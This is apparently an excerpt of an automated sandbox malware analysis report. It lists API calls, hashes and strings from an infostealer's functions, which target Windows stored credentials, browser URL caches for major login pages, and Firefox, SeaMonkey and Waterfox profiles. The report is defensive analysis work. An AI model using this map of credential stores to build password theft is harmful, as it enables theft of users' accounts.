                                                                                              • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                                                              • memcpy.MSVCRT ref: 0040BD2B
                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 509814883-3916222277
                                                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile$??3@ErrorLast
                                                                                              • String ID: |A
                                                                                              • API String ID: 1407640353-1717621600
                                                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                              • String ID: r!A
                                                                                              • API String ID: 2791114272-628097481
                                                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                              • API String ID: 62308376-4196376884
                                                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                              • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                              • memcpy.MSVCRT ref: 0040BEB2
                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3191383707-0
                                                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                              • API String ID: 3527940856-11920434
                                                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                              • API String ID: 3527940856-2068335096
                                                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                              • memset.MSVCRT ref: 00404020
                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                              • API String ID: 3527940856-3369679110
                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                              • API String ID: 3510742995-2641926074
                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                              • memcpy.MSVCRT ref: 004033D0
                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                              • String ID: $0.@
                                                                                              • API String ID: 3030842498-1896041820
                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2941347001-0
                                                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                              • API String ID: 3249829328-1174173950
                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 669240632-0
                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                              • String ID: "%s"
                                                                                              • API String ID: 1343145685-3297466227
                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
